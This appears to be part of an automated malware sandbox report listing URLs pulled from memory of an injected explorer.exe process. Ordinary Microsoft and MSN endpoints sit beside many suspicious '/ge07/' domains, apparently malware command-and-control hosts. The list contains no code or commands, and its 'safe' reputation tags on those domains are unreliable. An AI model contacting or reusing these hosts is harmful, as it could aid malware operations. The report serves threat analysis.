                                        http://www.hemicans.xyz/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winterexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            http://www.ivglass.xyzReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.eries-htii.xyz/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.croom.net/ge07/www.ngeribe2.homesexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.estwestcottwines.shop/ge07/www.rowadservepros.netexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://excel.office.comexplorer.exe, 00000008.00000002.3718157848.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1284451147.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://www.croom.net/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.onsfskfsmpfssfpewqdsawqe.xyz/ge07/www.g18q11a.topexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.ehkd.top/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.giyztm.xyz/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.ivglass.xyz/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.xhyx.top/ge07/explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.isit-txax.xyz/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.giyztm.xyzReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.xhyx.topReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.rowadservepros.netexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&ocexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://wns.windows.com/explorer.exe, 00000008.00000000.1280533641.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3075660070.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3714018507.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271408637.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.epehr.picsexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.hemicans.xyzexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.isit-txax.xyzexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000008.00000000.1284451147.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271156102.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3721095167.000000000C42E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076134518.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076095169.000000000C41F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          https://word.office.comexplorer.exe, 00000008.00000002.3718157848.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1284451147.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.hemicans.xyzReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.ngeribe2.homesexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.xhyx.topexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.isit-txax.xyzReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://outlook.comexplorer.exe, 00000008.00000002.3718157848.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1284451147.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.ehkd.topexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.g18q11a.top/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.ngeribe2.homes/ge07/www.epehr.picsexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.estwestcottwines.shopexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.croom.netReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000008.00000000.1280533641.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271330735.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000008.00000000.1280533641.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077610962.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3713048612.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271408637.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.epehr.pics/ge07/www.amyard.shopexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.onsfskfsmpfssfpewqdsawqe.xyz/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.amyard.shop/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.giyztm.xyz/ge07/www.xhyx.topexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.croom.netexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000008.00000002.3713048612.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271408637.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1280533641.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077610962.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.g18q11a.top/ge07/www.ehkd.topexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.isit-txax.xyz/ge07/www.9net88.netexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.g18q11a.topReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.pollensense.com/explorer.exe, 00000008.00000002.3708193539.00000000071A4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.9net88.netReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.microexplorer.exe, 00000008.00000000.1279234612.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3712395597.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1280089408.0000000008820000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.amyard.shopReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.estwestcottwines.shopReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
